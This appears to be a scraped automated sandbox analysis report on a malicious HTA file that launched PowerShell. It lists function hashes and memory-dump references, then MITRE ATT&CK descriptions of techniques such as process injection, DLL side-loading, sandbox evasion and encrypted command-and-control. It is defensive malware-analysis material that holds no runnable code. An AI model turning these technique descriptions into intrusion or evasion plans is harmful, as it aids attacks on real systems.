4'fq, xrefs: 079A1556

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$$fq$$fq
API String ID: 0-2297391932
Opcode ID: eb61b139016dfc1ba9133072224deaa89fd14e94446ee14568fcaf4949e8bba1
Instruction ID: 1df1b111d3c77860e99f2ec87934168685d0bbbca6c736f742c07d673e9f2cf9
Opcode Fuzzy Hash: eb61b139016dfc1ba9133072224deaa89fd14e94446ee14568fcaf4949e8bba1
Instruction Fuzzy Hash: A331FBB554634EFFCF258F1DC4402AA7BFDAF42268F2985A6D8158B291E334C940CBE1

Function 03439235 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

Tefq, xrefs: 03439235

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID: Tefq
API String ID: 0-1066582953
Opcode ID: 0cfc10f656ff5c96e3bd77a18dfdf194ec2e7660fa6545d8965e7b18a65511a1
Instruction ID: dfc30316ce3f79fd4e25c13b7039b2abce92fab80114ee00ec6c8164938fac2c
Opcode Fuzzy Hash: 0cfc10f656ff5c96e3bd77a18dfdf194ec2e7660fa6545d8965e7b18a65511a1
Instruction Fuzzy Hash: DA41C7B4A44229CFDB64DF24D984BA9B7B1BF4D301F2040EAD419AB361DB709D85CF15

Function 079A0B98 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

4'fq, xrefs: 079A0C4F

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq
API String ID: 0-2007657732
Opcode ID: ee1fff51967ce8e953c91862ac78b7bf8692e389f2802092997ec294aab4450a
Instruction ID: eb84387b67b5a5e123c403957ef223f93e8ad2d77d6baf09e16a9e5e74ebde1c
Opcode Fuzzy Hash: ee1fff51967ce8e953c91862ac78b7bf8692e389f2802092997ec294aab4450a
Instruction Fuzzy Hash: DD119DB0A0230AAFCF60DF2DC54476ABBB9EF49258F2484669409DB251F731D981CBE1

Function 034359A0 Relevance: .8, Instructions: 786COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981f8307919cd4d48fabfd19c921c0bbcc81d9a4a44cf60c76b86de33fa25b71
Instruction ID: 3e63fbb1a7ebcdbdd5ba8e2725ab6699e7997a0becc5a72ed00101aa8a2fdf08
Opcode Fuzzy Hash: 981f8307919cd4d48fabfd19c921c0bbcc81d9a4a44cf60c76b86de33fa25b71
Instruction Fuzzy Hash: D1624074A052499FCB05DFA8D484A9EFBF1FF4A310F298196E854AB352C735EC81CB94

Function 034335F8 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4956f27f31b4658edf9bbb63b157dba725c0c347dc27fe3d38b1dca93da844d
Instruction ID: d17f77ba661c0263837cc8ae00f5771eebb15a2963d3f94b7618a7f2aa43140e
Opcode Fuzzy Hash: a4956f27f31b4658edf9bbb63b157dba725c0c347dc27fe3d38b1dca93da844d
Instruction Fuzzy Hash: 8A123C74A00249DFCB15CFA8C494AAEFBB2FF49310F28859AE415AB365C735EC41CB94

Function 03434FD0 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d771932f694c1b44c8fad7f124743d87ffcda50cf5b043784a4e4de0282a5281
Instruction ID: 9b9a216b027dbb5438c3df3313d8e4dbf6453dd937854ceead4c2eefada86c0c
Opcode Fuzzy Hash: d771932f694c1b44c8fad7f124743d87ffcda50cf5b043784a4e4de0282a5281
Instruction Fuzzy Hash: 98022F74A042599FCB15CF98C484A9EFBB2FF4A310F29819AE815AB351C735EC81CB94

Function 03439C70 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e165def673d8402125f6143022afaff58910aa1c054ec991c70f0c60787b9dda
Instruction ID: 8a6da14d207d6ac7392e7b7a8763f2dd8dd7c2beef755d4f7b1dfbbf08cd9bf7
Opcode Fuzzy Hash: e165def673d8402125f6143022afaff58910aa1c054ec991c70f0c60787b9dda
Instruction Fuzzy Hash: F0513570D05219DFDB04CFA9D845BEEBBF6BF8A310F14806AE015AB280C7B45A85CF48

Function 03438727 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a6d74abd967869f1859753449e638ae85b97c50c1337f95c491da744d702f8
Instruction ID: fafa2eac61b20c03d2cb607c2be4de97a780288e176422ddc0cbc68821b855e6
Opcode Fuzzy Hash: e7a6d74abd967869f1859753449e638ae85b97c50c1337f95c491da744d702f8
Instruction Fuzzy Hash: E9617178E02228CFDB64DF65D988B9DBBB2BB4A300F1091EAD409A7350DB345E85CF51

Function 079A3CAC Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b354b311e88c423f81e097c936197f9a6eb8006730bb3e0354ab16010635a64c
Instruction ID: 9e66ca628f643b7d7473f46417a40740cdf967299386292c1e70e99812e98ea1
Opcode Fuzzy Hash: b354b311e88c423f81e097c936197f9a6eb8006730bb3e0354ab16010635a64c
Instruction Fuzzy Hash: 0D41F7F4A02302FFCB608B69C541A6AFBA69F95318F6584A9D504CF241D732DC45CBE1

Function 03433A49 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d482e8154a2b61e02ac1f5e5ef78ab653865eb9ed79f229074570573086fbec3
Instruction ID: b0ed85f0517bf782a4112420a8e84a7a2fbdb63d76620a60498b615bfbda4d6e
Opcode Fuzzy Hash: d482e8154a2b61e02ac1f5e5ef78ab653865eb9ed79f229074570573086fbec3
Instruction Fuzzy Hash: B24178B8A00205DFCB05CF59C598AAEFBB5FF49314B15829AD801AB361C732FC50CBA4

Function 034399E8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8529bfa4b0d34956c0288acfc4897a0cf2b35b02c0f4143d3725734a14dc8e
Instruction ID: 6d780dfd7e9df35b09f726372b14da00e8a3b9892ecebc4318e756e8d9baf236
Opcode Fuzzy Hash: 5f8529bfa4b0d34956c0288acfc4897a0cf2b35b02c0f4143d3725734a14dc8e
Instruction Fuzzy Hash: 823124B4D09248DFCB04DFAAD9446EEBBF2EF8A300F1081AAD809AB351D7755A45CB54

Function 03439509 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38b01196b4eea07ac53e929a0894d8afaae5e766dc529dcafc867abff6956f1
Instruction ID: 87730d17f2488f8daef5a4586d6ff9501de47b8ed3deb0fa9702b611a72841cd
Opcode Fuzzy Hash: b38b01196b4eea07ac53e929a0894d8afaae5e766dc529dcafc867abff6956f1
Instruction Fuzzy Hash: 52311676D0424A9FCB40DFA9D1486EDBBF0EF4D221F14056BD926EB240E77459808F64

Function 034330C6 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148d8294ab681c3e486d81c6be7478ea9e49b34e629c74d7f1e26acabd588fca
Instruction ID: ed64f999d34d5c03a903093257470b70e53c83e4bb4ebcc69c30771b28fc1a90
Opcode Fuzzy Hash: 148d8294ab681c3e486d81c6be7478ea9e49b34e629c74d7f1e26acabd588fca
Instruction Fuzzy Hash: 682171B9A052499FCB05CF98C8819AEBBB1FF8A310B05419AD555DB352C334ED45CBA1

Function 03433150 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563896a2597237d34388db374edfd787c3cd5277713433aaf3a12cd68e6ac181
Instruction ID: e1f268a0ff0927b8b4865e067ca583224fc6e5b2a13372b4a1b646a7a1b761d4
Opcode Fuzzy Hash: 563896a2597237d34388db374edfd787c3cd5277713433aaf3a12cd68e6ac181
Instruction Fuzzy Hash: 49215EB8A04209DFCB04CF9CC8809AEBBB4FF89310B148196D915EB352C734ED41CBA1

Function 03438B48 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a8973ce5084e87da749a6da43ff3898d5dfcae4cd28a3f39812bace25145b3
Instruction ID: f482ec3bc9547bd93f3a599a072612f5f72d6b947bd2004a091dab531ce8608a
Opcode Fuzzy Hash: 70a8973ce5084e87da749a6da43ff3898d5dfcae4cd28a3f39812bace25145b3
Instruction Fuzzy Hash: F311FBB4E00209DFCB84DFA8D5555AEBBF1FF89200F2481AAD409E7361DB349E41CB91

Function 0334D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121336527.000000000334D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0334D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_334d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a74994974fc945665e2695e8933ca301c4ac53a57a80f4a823edbecb6fbed8
Instruction ID: 98f68387e1722f8a4b703321cb1cb0e287e9263204166fb8cb3bc45e98fa50d3
Opcode Fuzzy Hash: d9a74994974fc945665e2695e8933ca301c4ac53a57a80f4a823edbecb6fbed8
Instruction Fuzzy Hash: EA014C6240D3C05FD7128B258D94752BFE8DF53224F1981DBE9888F1A3C26D6C45CBB2

Function 0334D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121336527.000000000334D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0334D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_334d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b980109c83b9e78b8d1969fdc088e77cbfb6d761c2f3712b6ca1a8c9a0256ce
Instruction ID: 5f5c74447953bd5e97c756737820eab96f45beee42567c4921a362befaf362e9
Opcode Fuzzy Hash: 3b980109c83b9e78b8d1969fdc088e77cbfb6d761c2f3712b6ca1a8c9a0256ce
Instruction Fuzzy Hash: 1301BCB14083009AE7208B298CC4B66BBDCDB41364F08855AED484B683C66CA841CAB1

Function 034394C9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74b61c45f09ad0b99d25f3ebff74ad6d999287e5b24538fe15910ab8d66a16e
Instruction ID: dbbd01592b8a8b893e3e20d35e4df4aef18cb03257936c6a8407072b97a94321
Opcode Fuzzy Hash: b74b61c45f09ad0b99d25f3ebff74ad6d999287e5b24538fe15910ab8d66a16e
Instruction Fuzzy Hash: E7E04F708193989FC742DFB8EA4929DBFB0AB06212F1841EBD888D6361D7394B84CB51

Non-executed Functions

Function 0343D118 Relevance: 5.4, Strings: 4, Instructions: 353COMMON

Download Yara Rule

Strings

Nveq, xrefs: 0343D4DA
}s, xrefs: 0343D53B
TJkq, xrefs: 0343D165
0AF, xrefs: 0343D396

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID: 0AF$Nveq$TJkq$}s
API String ID: 0-520193668
Opcode ID: 89b48c1a0f19e6881863a58b7eb296606dc02e7206067cf3ef9fb2c96004c863
Instruction ID: 29fae17a608a410ac9158a04dba3ebd3e9fd2aeb6721db0c666ba81adf60a358
Opcode Fuzzy Hash: 89b48c1a0f19e6881863a58b7eb296606dc02e7206067cf3ef9fb2c96004c863
Instruction Fuzzy Hash: E9E1D678E052198FCB44CFA9D8849AEBBF6FF8A300F209566E419EB355D730A941CF54

Function 0343A828 Relevance: .7, Instructions: 672COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e182290521513ef3329de10071214bc8c6a1d87294bbe5730ea42d377a793c
Instruction ID: 36819184bceade894486276affc1bb3c1ddefa6619614913bbe0bf28d220794e
Opcode Fuzzy Hash: 33e182290521513ef3329de10071214bc8c6a1d87294bbe5730ea42d377a793c
Instruction Fuzzy Hash: 15625770805208CFE704CF98D688A9ABBF6FF0A315F19D159E9155F252C7B4E885CF98

Function 0343A819 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2121742438.0000000003430000.00000040.00000800.00020000.00000000.sdmp, Offset: 03430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424c0449cf4c05ad2fc077376941d206c79bce03a8d2a91c67f685fa4e08161a
Instruction ID: d751c74000fb34092042c47231ae27a20239c81d39ee8d360dba990fc800725d
Opcode Fuzzy Hash: 424c0449cf4c05ad2fc077376941d206c79bce03a8d2a91c67f685fa4e08161a
Instruction Fuzzy Hash: 05C14771956208CFE308CF99D648A8ABFF6EF0A305F09D059D5451F262C7B5D886CF89

Function 079A3348 Relevance: 9.2, Strings: 7, Instructions: 477COMMON

Download Yara Rule

Strings

tPfq, xrefs: 079A33D1
tPfq, xrefs: 079A33C5
$fq, xrefs: 079A338C
4'fq, xrefs: 079A35B9
$fq, xrefs: 079A3380
4'fq, xrefs: 079A35AF
$fq, xrefs: 079A335A

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
API String ID: 0-332123906
Opcode ID: 618150019b1c8ef9acc88ede0192011a46845320e57ebdd8b82e49fc39141313
Instruction ID: 4e27aee2111daf32017e9a24118905af4f6d1d0d4bddb2f4a90d7d23b8650d53
Opcode Fuzzy Hash: 618150019b1c8ef9acc88ede0192011a46845320e57ebdd8b82e49fc39141313
Instruction Fuzzy Hash: F8F125B2B05206AFDB248BAD840166ABBEAAFD5328F14847AD509CF341DF71DC45C7E1

Function 079A06F0 Relevance: 6.3, Strings: 5, Instructions: 73COMMON

Download Yara Rule

Strings

4'fq, xrefs: 079A0767
$fq, xrefs: 079A0746
4'fq, xrefs: 079A06D3
$fq, xrefs: 079A073A
4'fq, xrefs: 079A075B

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$$fq$$fq
API String ID: 0-566344784
Opcode ID: 87fee3b842a0ddc40e7a1d0782daa7b2f1d8cce66d32ee21dca7d03991cc6f5a
Instruction ID: f3996d6362a11d4d234b03a35160072bf5e74b88db16cd5c8f5a4a44abe52b4d
Opcode Fuzzy Hash: 87fee3b842a0ddc40e7a1d0782daa7b2f1d8cce66d32ee21dca7d03991cc6f5a
Instruction Fuzzy Hash: CE116AA1B0A314ABC729262D2C2017A6F6B4FC2668B19016BC041DB3D2ED2A4D43D7D7

Function 079A53B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$fq, xrefs: 079A53DE
$fq, xrefs: 079A5418
$fq, xrefs: 079A540C
$fq, xrefs: 079A53C2

Memory Dump Source

Source File: 00000007.00000002.2155825646.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 141878d211ed59c2538f5d3bbe2de17d4257f3965164586cd765612eb9e0e102
Instruction ID: e02bba9e77773f467ee933f701121c2154f2901d31e1dd2d3ab3207a2f1eb1ce
Opcode Fuzzy Hash: 141878d211ed59c2538f5d3bbe2de17d4257f3965164586cd765612eb9e0e102
Instruction Fuzzy Hash: 422177B1711312BBDB34966E9840B2BB7DF9BC171AF35843AE544CB381DEB5C85083A1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

Networking

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

